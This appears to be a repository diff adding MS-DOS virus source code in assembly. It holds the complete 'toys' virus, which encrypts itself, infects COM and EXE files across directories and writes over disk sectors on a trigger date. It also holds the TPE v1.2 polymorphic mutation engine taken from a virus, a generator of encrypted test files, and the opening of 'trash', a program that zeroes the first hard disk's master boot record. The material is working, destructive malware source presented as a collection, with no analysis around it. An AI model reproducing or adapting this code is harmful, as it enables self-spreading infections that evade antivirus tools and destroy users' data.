db ' º Written by Y.T.J.C.T º',0Dh, 0Ah
db ' º in Ping Tung. TAIWAN º',0Dh, 0Ah
db ' º Don''t Worry,be Happy º',0Dh, 0Ah
db ' ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ$'
Marker db 'YTIT'
db 28 dup (0)
;***************************************************************************
;*End of virus. The bytes below this line are the infected program and the *
;* viruses' identification bytes. *
;***************************************************************************
Host_Program:
mov ax,4c00
int 21
Infected_Mark db 'YTIT'
end start

381
MSDOS/Virus.MSDOS.Unknown.toys.asm Normal file
View File

@ -0,0 +1,381 @@
; toys.asm : Unknown by Unknown
; Created wik the Phalcon/Skism Mass-Produced Code Generator
; from the configuration file skeleton.cfg
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
id = 'FZ' ; ID word for EXE infections
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: loop decrypt ; handles encryption and decryption
patch_startencrypt:
mov si,offset startencrypt ; start of decryption
mov dx,(offset heap - offset startencrypt)/2 ; iterations
decrypt_loop:
db 2eh,81h,34h ; xor word ptr cs:[si], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc si ; calculate new decryption location
inc si
dec dx ; If we are not done, then
jnz decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
cmp sp,id ; COM or EXE?
je restoreEXE
restoreCOM:
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsb
jmp short restoreEXIT
restoreEXE:
push ds
push es
push cs ; DS = CS
pop ds
push cs ; ES = CS
pop es
lea si,[bp+jmpsave2]
lea di,[bp+jmpsave]
movsw
movsw
movsw
restoreEXIT:
movsw
mov byte ptr [bp+numinfec],2 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+exe_mask]
call infect_mask
lea dx,[bp+com_mask]
call infect_mask
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
mov ah,2ah ; Get current date
int 21h
cmp dh,6 ; Check month
cmp dl,19 ; Check date
jb exit_virus
cmp al,-1 ; Check date of week
jz activate
mov ah,2ch ; Get current time
int 21h
cmp ch,18 ; Check the hour
jnz exit_virus
cmp cl,-1 ; Check the minute
jnz exit_virus
cmp dh,-1 ; Check the seconds
jnz exit_virus
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
cmp sp,id-4 ; EXE or COM?
jz returnEXE
returnCOM:
int 21h
retn ; 100h is on stack
returnEXE:
pop es
pop ds
int 21h
mov ax,es ; AX = PSP segment
add ax,10h ; Adjust for PSP
add word ptr cs:[bp+jmpsave+2],ax
add ax,word ptr cs:[bp+stacksave+2]
cli ; Clear intrpts for stack manipulation
mov sp,word ptr cs:[bp+stacksave]
mov ss,ax
sti
db 0eah ; jmp ssss:oooo
jmpsave dd ? ; Original CS:IP
stacksave dd ? ; Original SS:SP
jmpsave2 db ? ; Actually four bytes
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
stacksave2 dd ?
activate: mov si,offset data00 ; SI points to data
mov ah,0Eh ; BIOS display char. function
display_loop: lodsb ; Load the next char. into AL
or al,al ; Is the character a null?
je disp_strnend ; If it is, exit
int 010h ; BIOS video interrupt
jmp short display_loop ; Do the next character
disp_strnend:
mov ax,0002h ; First argument is 2
mov cx,00C8h ; Second argument is 200
cli ; Disable interrupts (no Ctrl-C)
cwd ; Clear DX (start with sector 0)
int 026h ; DOS absolute write interrupt
sti ; Restore interrupts
cli ; Clear the interrupt flag
hlt ; HaLT the computer
jmp short $ ; Just to make sure
jmp exit_virus
data00 db 10,13,"All my toys are broken",13,10
db "And so am I inside.",13,10
db "The carnival has closed",13,10
db "Years ago...",13,10,0
;creator db '[MPC]',0 ; Mass Produced Code Generator
infect_mask:
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc exit_infect_mask ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
cmp word ptr [bp+buffer],'ZM'; EXE?
jz checkEXE ; Why yes, yes it is!
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
cmp ax,50000 ; Is it too large?
ja find_next
mov bx,word ptr [bp+buffer+1]; get jmp location
add bx,heap-decrypt+3 ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
jnz infect_exe
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
exit_infect_mask: ret
infect_exe:
les ax, dword ptr [bp+buffer+14h] ; Save old entry point
mov word ptr [bp+jmpsave2], ax
mov word ptr [bp+jmpsave2+2], es
les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
mov word ptr [bp+stacksave2], es
mov word ptr [bp+stacksave2+2], ax
mov ax, word ptr [bp+buffer + 8] ; Get header size
mov cl, 4 ; convert to bytes
shl ax, cl
xchg ax, bx
les ax, [bp+offset newDTA+26]; Get file size
mov dx, es ; to DX:AX
push ax
push dx
sub ax, bx ; Subtract header size from
sbb dx, 0 ; file size
mov cx, 10h ; Convert to segment:offset
div cx ; form
mov word ptr [bp+buffer+14h], dx ; New entry point
mov word ptr [bp+buffer+16h], ax
mov word ptr [bp+buffer+0Eh], ax ; and stack
mov word ptr [bp+buffer+10h], id
pop dx ; get file length
pop ax
add ax, heap-decrypt ; add virus size
adc dx, 0
mov cl, 9
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 1 ; mod 512
mov word ptr [bp+buffer+4], dx ; new file size
mov word ptr [bp+buffer+2], ax
push cs ; restore ES
pop es
push word ptr [bp+buffer+14h] ; needed later
mov cx, 1ah
jmp short finishinfection
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb
add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
pop ax ; remove call from stack
jmp done_infections
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bx
push bp
endwrite:
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
exe_mask db '*.exe',0
com_mask db '*.com',0
dot_dot db '..',0
heap: ; Variables not in code
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point

101
MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm Normal file
View File

@ -0,0 +1,101 @@
;----------------------------------------------------------------------------
; TPE-GEN - This program generates 50 TPE encrypted test files
;
; This source can be compiled with MASM 5.0 or TASM 2.01
; (and perhaps others too, but this is not tested.)
;----------------------------------------------------------------------------
.model tiny
.RADIX 16
.code
extrn crypt:near ;external routines in engine
extrn rnd_get:near
extrn rnd_init:near
org 0100
begin: call rnd_init ;init. random number generator
mov dx,offset starttxt ;print message
mov ah,09
int 21
mov cx,50d ;repeat 50 times
lop: push cx
mov ah,3C ;create a new file
mov dx,offset filename
mov cx,0020
int 21
xchg ax,bx
push ds
push es
push bx
mov ax,cs ;input parameters for engine
mov ds,ax
add ax,0400
mov es,ax ;ES = DS + 400h
xor si,si ;code will be right after decr.
mov dx,offset hello ;this will be encrtypted
mov cx,100d ;length of code to encrypt
mov bp,0100 ;decryptor will start at 100h
call rnd_get ;AX register will be random
call crypt ;call the engine
pop bx ;write crypted file
mov ah,40
int 21
mov ah,3E ;close the file
int 21
pop es
pop ds
mov di,offset filename ;adjust name for next file
mov bx,7 ; (increment number)
incnum: inc byte ptr ds:[bx+di]
cmp byte ptr ds:[bx+di],'9'
jbe numok
mov byte ptr ds:[bx+di],'0'
dec bx
jnz incnum
numok: pop cx ;do it again...
loop lop
exit: int 20
;----------------------------------------------------------------------------
; Text and data
;----------------------------------------------------------------------------
starttxt db 'TPE-GEN - Generates 50 TPE encrypted test files.'
db 0Dh, 0Ah, '$'
filename db '00000000.COM',0
;----------------------------------------------------------------------------
; The small test file that will be encrypted
;----------------------------------------------------------------------------
hello: call next ;get relative offset
next: pop dx
add dx,10d ;find begin of message
mov ah,09 ;print message
int 21
int 20
db 'Hello, world!', 0Dh, 0A, '$'
db (100d) dup (90)
end begin


1028
MSDOS/Virus.MSDOS.Unknown.tpe-v11.asm Normal file
View File

File diff suppressed because it is too large Load Diff

990
MSDOS/Virus.MSDOS.Unknown.tpe-v12.asm Normal file
View File

@ -0,0 +1,990 @@
.radix 16
;-----------------------------------------------------------------------------
;
; TPE v1.2 Source Code
; --------------------
;
; Extracted from Coffee Shop virus by: Lucifer Messiah -- ANARKICK SYSTEMS
;
;-----------------------------------------------------------------------------
.model tiny
.code
public rnd_init
public rnd_get
public crypt
public tpe_bottom
public tpe_top
;****************************************************************************
;* Data area for engine
;****************************************************************************
org 0e0
TPE12:
add_val dw 0
xor_val dw 0
xor_offset dw 0
where_len dw 0
where_len2 dw 0
flags db 0
;****************************************************************************
;* Begin of virus, installation in memory
;****************************************************************************
org 0100
;****************************************************************************
;* Insert virus code here, or compile and link to virus
;****************************************************************************
;****************************************************************************
;*
;* Encryption Engine
;*
;*
;* Input: ES work segment
;* DS:DX code to encrypt
;* BP what will be start of decryptor
;* SI what will be distance between decryptor and code
;* CX length of code
;* AX flags: bit 0: DS will not be equal to CS
;* bit 1: insert random instructions
;* bit 2: put junk before decryptor
;* bit 3: preserve AX with decryptor
;*
;* Output: ES: work segment (preserved)
;* DS:DX decryptor + encrypted code
;* BP what will be start of decryptor (preserved)
;* DI length of decryptor / offset of encrypted code
;* CX length of decryptor + encrypted code
;* AX length of encrypted code
;* (other registers may be trashed)
;*
;****************************************************************************
tpe_top equ $
db '[ MK / Trident ]'
crypt:
xor di,di ;di = start of decryptor
push dx ;save offset of code
push si ;save future offset of code
mov byte ptr ds:[flags],al ;save flags
test al,8 ;push AX?
jz no_push
mov al,50
stosb
no_push: call rnd_get ;add a few bytes to cx
and ax,1F
add cx,ax
push cx ;save length of code
call rnd_get ;get random flags
xchg ax,bx
;BX flags:
;0,1 how to encrypt
;2,3 which register for encryption
;4 use byte or word for encrypt
;5 MOV AL, MOV AH or MOV AX
;6 MOV CL, MOV CH or MOV CX
;7 AX or DX
;8 count up or down
;9 ADD/SUB/INC/DEC or CMPSW/SCASW
;A ADD/SUB or INC/DEC
; CMPSW or SCASW
;B offset in XOR instruction?
;C LOOPNZ or LOOP
; SUB CX or DEC CX
;D carry with crypt ADD/SUB
;E carry with inc ADD/SUB
;F XOR instruction value or AX/DX
random: call rnd_get ;get random encryption value
or al,al
jz random ;again if 0
mov ds:[xor_val],ax
call do_junk ;insert random instructions
pop cx
mov ax,0111 ;make flags to remember which
test bl,20 ; MOV instructions are used
jnz z0
xor al,07
z0: test bl,0C
jnz z1
xor al,70
z1: test bl,40
jnz z2
xor ah,7
z2: test bl,10
jnz z3
and al,73
z3: test bh,80
jnz z4
and al,70
z4: mov dx,ax
mov_lup: call rnd_get ;put MOV instructions in
and ax,000F ; a random order
cmp al,0A
ja mov_lup
mov si,ax
push cx ;test if MOV already done
xchg ax,cx
mov ax,1
shl ax,cl
mov cx,ax
and cx,dx
pop cx
jz mov_lup
xor dx,ax ;remember which MOV done
push dx
call do_mov ;insert MOV instruction
call do_nop ;insert a random NOP
pop dx
or dx,dx ;all MOVs done?
jnz mov_lup
push di ;save start of decryptor loop
call do_add_ax ;add a value to AX in loop?
call do_nop
test bh,20 ;carry with ADD/SUB ?
jz no_clc
mov al,0F8
stosb
no_clc: mov word ptr ds:[xor_offset],0
call do_xor ;place all loop instructions
call do_nop
call do_add
pop dx ;get start of decryptor loop
call do_loop
test byte ptr ds:[flags],8 ;insert POP AX ?
jz no_pop
mov al,58
stosb
no_pop: xor ax,ax ;calculate loop offset
test bh,1 ;up or down?
jz v1
mov ax,cx
dec ax
test bl,10 ;encrypt with byte or word?
jz v1
and al,0FE
v1: add ax,di
add ax,bp
pop si
add ax,si
sub ax,word ptr ds:[xor_offset]
mov si,word ptr ds:[where_len]
test bl,0C ;are BL,BH used for encryption?
jnz v2
mov byte ptr es:[si],al
mov si,word ptr ds:[where_len2]
mov byte ptr es:[si],ah
jmp short v3
v2: mov word ptr es:[si],ax
v3: mov dx,word ptr ds:[xor_val] ;encryption value
pop si ;ds:si = start of code
push di ;save ptr to encrypted code
push cx ;save length of encrypted code
test bl,10 ;byte or word?
jz blup
inc cx ;cx = # of crypts (words)
shr cx,1
lup: lodsw ;encrypt code (words)
call do_encrypt
stosw
loop lup
jmp short klaar
blup: lodsb ;encrypt code (bytes)
xor dh,dh
call do_encrypt
stosb
loop blup
klaar: mov cx,di ;cx = length decryptpr + code
pop ax ;ax = length of decrypted code
pop di ;di = offset encrypted code
xor dx,dx ;ds:dx = decryptor + cr. code
push es
pop ds
ret
;****************************************************************************
;* encrypt the code
;****************************************************************************
do_encrypt: add dx,word ptr ds:[add_val]
test bl,2
jnz lup1
xor ax,dx
ret
lup1: test bl,1
jnz lup2
sub ax,dx
ret
lup2: add ax,dx
ret
;****************************************************************************
;* generate mov reg,xxxx
;****************************************************************************
do_mov: mov dx,si
mov al,byte ptr ds:[si+mov_byte]
cmp dl,4 ;BX?
jne is_not_bx
call add_ind
is_not_bx: test dl,0C ;A*?
pushf
jnz is_not_a
test bl,80 ;A* or D*?
jz is_not_a
add al,2
is_not_a: call alter ;insert the MOV
popf ;A*?
jnz is_not_a2
mov ax,word ptr ds:[xor_val]
jmp short sss
is_not_a2: test dl,8 ;B*?
jnz is_not_b
mov si,offset where_len
test dl,2
jz is_not_bh
add si,2
is_not_bh: mov word ptr ds:[si],di
jmp short sss
is_not_b: mov ax,cx ;C*
test bl,10 ;byte or word encryption?
jz sss
inc ax ;only half the number of bytes
shr ax,1
sss: test dl,3 ;byte or word register?
jz is_x
test dl,2 ;*H?
jz is_not_h
xchg al,ah
is_not_h: stosb
ret
is_x: stosw
ret
;****************************************************************************
;* insert MOV or alternative for MOV
;****************************************************************************
alter: push bx
push cx
push ax
call rnd_get
xchg ax,bx
pop ax
test bl,3 ;use alternative for MOV?
jz no_alter
push ax
and bx,0F
and al,08
shl ax,1
or bx,ax
pop ax
and al,7
mov cl,9
xchg ax,cx
mul cl
add ax,30C0
xchg al,ah
test bl,4
jz no_sub
mov al,28
no_sub: call maybe_2
stosw
mov al,80
call maybe_2
stosb
mov ax,offset add_mode
xchg ax,bx
and ax,3
xlat
add al,cl
no_alter: stosb
pop cx
pop bx
ret
;****************************************************************************
;* insert ADD AX,xxxx
;****************************************************************************
do_add_ax: push cx
mov si,offset add_val ;save add-value here
mov word ptr ds:[si],0
mov ax,bx
and ax,8110
xor ax,8010
jnz no_add_ax ;use ADD?
mov ax,bx
xor ah,ah
mov cl,3
div cl
or ah,ah
jnz no_add_ax ;use ADD?
test bl,80
jnz do_81C2 ;AX or DX?
mov al,5
stosb
jmp short do_add0
do_81C2: mov ax,0C281
stosw
do_add0: call rnd_get
mov word ptr ds:[si],ax
stosw
no_add_ax: pop cx
ret
;****************************************************************************
;* generate encryption command
;****************************************************************************
do_xor: test byte ptr ds:[flags],1
jz no_cs
mov al,2E ;insert CS: instruction
stosb
no_cs: test bh,80 ;type of XOR command
jz xor1
call get_xor ;encrypt with register
call do_carry
call save_it
xor ax,ax
test bl,80
jz xxxx
add al,10
xxxx: call add_dir
test bh,8
jnz yyyy
stosb
ret
yyyy: or al,80
stosb
call rnd_get
stosw
mov word ptr ds:[xor_offset],ax
ret
xor1: mov al,080 ;encrypt with value
call save_it
call get_xor
call do_carry
call xxxx
mov ax,word ptr ds:[xor_val]
test bl,10
jmp byte_word
;****************************************************************************
;* generate increase/decrease command
;****************************************************************************
do_add: test bl,8 ;no CMPSW/SCASW if BX is used
jz da0
test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
jnz do_cmpsw
da0: test bh,4 ;ADD/SUB or INC/DEC?
jz add1
mov al,40 ;INC/DEC
test bh,1 ;up or down?
jz add0
add al,8
add0: call add_ind
stosb
test bl,10 ;byte or word?
jz return
stosb ;same instruction again
return: ret
add1: test bh,40 ;ADD/SUB
jz no_clc2 ;carry?
mov al,0F8 ;insert CLC
stosb
no_clc2: mov al,083
stosb
mov al,0C0
test bh,1 ;up or down?
jz add2
mov al,0E8
add2: test bh,40 ;carry?
jz no_ac2
and al,0CF
or al,10
no_ac2: call add_ind
stosb
mov al,1 ;value to add/sub
save_it: call add_1
stosb
ret
do_cmpsw: test bh,1 ;up or down?
jz no_std
mov al,0FDh ;insert STD
stosb
no_std: test bh,4 ;CMPSW or SCASW?
jz normal_cmpsw
test bl,4 ;no SCASW if SI is used
jnz do_scasw
normal_cmpsw: mov al,0A6 ;CMPSB
jmp short save_it
do_scasw: mov al,0AE ;SCASB
jmp short save_it
;****************************************************************************
;* generate loop command
;****************************************************************************
do_loop: test bh,1 ;no JNE if couting down
jnz loop_loop ; (prefetch bug!)
call rnd_get
test al,1 ;LOOPNZ/LOOP or JNE?
jnz cx_loop
loop_loop: mov al,0E0
test bh,1A ;LOOPNZ or LOOP?
jz ll0 ; no LOOPNZ if xor-offset
add al,2 ; no LOOPNZ if CMPSW/SCASW
ll0: stosb
mov ax,dx
sub ax,di
dec ax
stosb
ret
cx_loop: test bh,10 ;SUB CX or DEC CX?
jnz cxl_dec
mov ax,0E983
stosw
mov al,1
stosb
jmp short do_jne
cxl_dec: mov al,49
stosb
do_jne: mov al,75
jmp short ll0
;****************************************************************************
;* add value to AL depending on register type
;****************************************************************************
add_dir: mov si,offset dir_change
jmp short xx1
add_ind: mov si,offset ind_change
xx1: push bx
shr bl,1
shr bl,1
and bx,3
add al,byte ptr ds:[bx+si]
pop bx
ret
;****************************************************************************
;* mov encryption command byte to AL
;****************************************************************************
get_xor: push bx
mov ax,offset how_mode
xchg ax,bx
and ax,3
xlat
pop bx
ret
;****************************************************************************
;* change ADD into ADC
;****************************************************************************
do_carry: test bl,2 ;ADD/SUB used for encryption?
jz no_ac
test bh,20 ;carry with (encr.) ADD/SUB?
jz no_ac
and al,0CF
or al,10
no_ac: ret
;****************************************************************************
;* change AL (byte/word)
;****************************************************************************
add_1: test bl,10
jz add_1_ret
inc al
add_1_ret: ret
;****************************************************************************
;* change AL (byte/word)
;****************************************************************************
maybe_2: call add_1
cmp al,81 ;can't touch this
je maybe_not
push ax
call rnd_get
test al,1
pop ax
jz maybe_not
add al,2
maybe_not: ret
;****************************************************************************
;* get random nop (or not)
;****************************************************************************
do_nop: test byte ptr ds:[flags],2
jz no_nop
yes_nop: call rnd_get
test al,3
jz nop8
test al,2
jz nop16
test al,1
jz nop16x
no_nop: ret
;****************************************************************************
;* Insert random instructions
;****************************************************************************
do_junk: test byte ptr ds:[flags],4
jz no_junk
call rnd_get ;put a random number of
and ax,0F ; dummy instructions before
inc ax ; decryptor
xchg ax,cx
junk_loop: call junk
loop junk_loop
no_junk: ret
;****************************************************************************
;* get rough random nop (may affect register values)
;****************************************************************************
junk: call rnd_get
and ax,1E
jmp short aa0
nop16x: call rnd_get
and ax,06
aa0: xchg ax,si
call rnd_get
jmp word ptr ds:[si+junkcals]
;****************************************************************************
;* NOP and junk addresses
;****************************************************************************
junkcals dw offset nop16x0
dw offset nop16x1
dw offset nop16x2
dw offset nop16x3
dw offset nop8
dw offset nop16
dw offset junk6
dw offset junk7
dw offset junk8
dw offset junk9
dw offset junkA
dw offset junkB
dw offset junkC
dw offset junkD
dw offset junkE
dw offset junkF
;****************************************************************************
;* NOP and junk routines
;****************************************************************************
nop16x0: and ax,000F ;J* 0000 (conditional)
or al,70
stosw
ret
nop16x1: mov al,0EBh ;JMP xxxx / junk
and ah,07
inc ah
stosw
xchg al,ah ;get lenght of bullshit
cbw
jmp fill_bullshit
nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
stosb
ret
nop16x3: call junkF ;INC / DEC or DEC / INC
xor al,8
stosb
ret
nop8: push bx ;8-bit NOP
and al,7
mov bx,offset nop_data8
xlat
stosb
pop bx
ret
nop16: push bx ;16-bit NOP
and ax,0303
mov bx,offset nop_data16
xlat
add al,ah
stosb
call rnd_get
and al,7
mov bl,9
mul bl
add al,0C0
stosb
pop bx
ret
junk6: push cx ;CALL xxxx / junk / POP reg
mov al,0E8
and ah,0F
inc ah
stosw
xor al,al
stosb
xchg al,ah
call fill_bullshit
call do_nop
call rnd_get ;insert POP reg
and al,7
call no_sp
mov cx,ax
or al,58
stosb
test ch,3 ;more?
jnz junk6_ret
call do_nop
mov ax,0F087 ;insert XCHG SI,reg
or ah,cl
test ch,8
jz j6_1
mov al,8Bh
j6_1: stosw
call do_nop
push bx
call rnd_get
xchg ax,bx
and bx,0F7FBh ;insert XOR [SI],xxxx
or bl,8
call do_xor
pop bx
junk6_ret: pop cx
ret
junk7: and al,0F ;MOV reg,xxxx
or al,0B0
call no_sp
stosb
test al,8
pushf
call rnd_get
popf
jmp short byte_word
junk8: and ah,39 ;DO r/m,r(8/16)
or al,0C0
call no_sp
xchg al,ah
stosw
ret
junk9: and al,3Bh ;DO r(8/16),r/m
or al,2
and ah,3F
call no_sp2
call no_bp
stosw
ret
junkA: and ah,1 ;DO rm,xxxx
or ax,80C0
call no_sp
xchg al,ah
stosw
test al,1
pushf
call rnd_get
popf
jmp short byte_word
junkB: call nop8 ;NOP / LOOP
mov ax,0FDE2
stosw
ret
junkC: and al,09 ;CMPS* or SCAS*
test ah,1
jz mov_test
or al,0A6
stosb
ret
mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
stosb
cmp al,0A8
pushf
call rnd_get
popf
jmp short byte_word
junkD: and al,07 ;XCHG AX,reg
or al,90
call no_sp
stosb
ret
junkE: and ah,07 ;PUSH reg / POP reg
or ah,50
mov al,ah
or ah,08
stosw
ret
junkF: and al,0F ;INC / DEC
or al,40
call no_sp
stosb
ret
;****************************************************************************
;* store a byte or a word
;****************************************************************************
byte_word: jz only_byte
stosw
ret
only_byte: stosb
ret
;****************************************************************************
;* don't fuck with SP!
;****************************************************************************
no_sp: push ax
and al,7
cmp al,4
pop ax
jnz no_sp_ret
and al,0FBh
no_sp_ret: ret
;****************************************************************************
;* don't fuck with SP!
;****************************************************************************
no_sp2: push ax
and ah,38
cmp ah,20
pop ax
jnz no_sp2_ret
xor ah,20
no_sp2_ret: ret
;****************************************************************************
;* don't use [BP+..]
;****************************************************************************
no_bp: test ah,4
jnz no_bp2
and ah,0FDh
ret
no_bp2: push ax
and ah,7
cmp ah,6
pop ax
jnz no_bp_ret
or ah,1
no_bp_ret: ret
;****************************************************************************
;* write byte for JMP/CALL and fill with random bullshit
;****************************************************************************
fill_bullshit: push cx
xchg ax,cx
bull_lup: call rnd_get
stosb
loop bull_lup
pop cx
ret
;****************************************************************************
;* random number generator (stolen from 'Bomber')
;****************************************************************************
rnd_init: push cx
call rnd_init0 ;init
and ax,000F
inc ax
xchg ax,cx
random_lup: call rnd_get ;call random routine a few
loop random_lup ; times to 'warm up'
pop cx
ret
rnd_init0: push dx ;initialize generator
push cx
mov ah,2C
int 21
in al,40
mov ah,al
in al,40
xor ax,cx
xor dx,ax
jmp short move_rnd
rnd_get: push dx ;calculate a random number
push cx
push bx
mov ax,0 ;will be: mov ax,xxxx
mov dx,0 ; and mov dx,xxxx
mov cx,7
rnd_lup: shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_l2
inc al
rnd_l2: loop rnd_lup
pop bx
move_rnd: mov word ptr ds:[rnd_get+4],ax
mov word ptr ds:[rnd_get+7],dx
mov al,dl
pop cx
pop dx
ret
;****************************************************************************
;* tables for engine
;****************************************************************************
; AX AL AH (BX) BL BH CX CL CH
mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5
; nop clc stc cmc cli cld incbp decbp
nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh
; or and xchg mov
nop_data16 db 8, 20, 84, 88
; bl/bh, bx, si di
dir_change db 07, 07, 04, 05
ind_change db 03, 03, 06, 07
; xor xor add sub
how_mode db 30, 30, 00, 28
; ? add xor or
add_mode db 0, 0C8, 0F0, 0C0
tpe_bottom equ $
end TPE12

1009
MSDOS/Virus.MSDOS.Unknown.tpe-v13.asm Normal file
View File

File diff suppressed because it is too large Load Diff

1028
MSDOS/Virus.MSDOS.Unknown.tpe_v11.asm Normal file
View File

File diff suppressed because it is too large Load Diff

1303
MSDOS/Virus.MSDOS.Unknown.tracebck.asm Normal file
View File

File diff suppressed because it is too large Load Diff

169
MSDOS/Virus.MSDOS.Unknown.trash.asm Normal file
View File

@ -0,0 +1,169 @@
page ,132
title Trash - smashes the boot record on the first hard disk
name TRASH
.radix 16
code segment
assume cs:code,ds:code
org 100
CODEX equ 0C000 ; Or use 0300 when tracing DOS
CR equ 0Dh
LF equ 0A
start:
jmp do_it
oldint1 dd ?
newintx dd ?
oldintx dd ?
trace db 1
found db 0
buffer db 200 dup (0)
message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
db 'This program, when run, will zero (DESTROY!) the',CR,LF
db 'master boot record of your first hard disk.',CR,LF,CR,LF
db 'The purpose of this is to test the antivirus software,',CR,LF
db 'so be sure you have installed your favourite',CR,LF
db 'protecting program before running this one!',CR,LF
db "(It's almost sure it will fail to protect you anyway!)",CR,LF
db CR,LF,'Press any key to abort, or',CR,LF
db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'
do_it:
mov ax,600 ; Clear the screen by scrolling it up
mov bh,7
mov dx,1950
xor cx,cx
int 10
mov ah,0F ; Get the current video mode
int 10 ; (the video page, more exactly)
mov ah,2 ; Home the cursor
xor dx,dx
int 10
mov ah,9 ; Print a warning message
mov dx,offset message
int 21
mov ax,0C08 ; Flush the keyboard and get a char
int 21
cmp al,0 ; Extendet ASCII?
jne quit1 ; Exit if not
mov ah,8 ; Get the key code
int 21
cmp al,6C ; Shift-F5?
jne quit1 ; Exit if not
mov ah,2 ; Get keyboard shift status
int 16
and al,1101b ; Ctrl-Alt-RightShift?
jnz proceed ; Proceed if so
quit1:
jmp quit ; Otherwise exit
proceed:
mov ah,9 ; Print the last message
mov dx,offset warned
int 21
mov ax,3501 ; Get interrupt vector 1 (single steping)
int 21
mov word ptr oldint1,bx
mov word ptr oldint1+2,es
mov ax,2501 ; Set new INT 1 handler
mov dx,offset newint1
int 21
mov ax,3513 ; Get interrupt vector 13
int 21
mov word ptr oldintx,bx
mov word ptr oldintx+2,es
mov word ptr newintx,bx
mov word ptr newintx+2,es
; The following code is sacred in it's present form.
; To change it would cause volcanos to errupt,
; the ground to shake, and program not to run!
mov ax,200
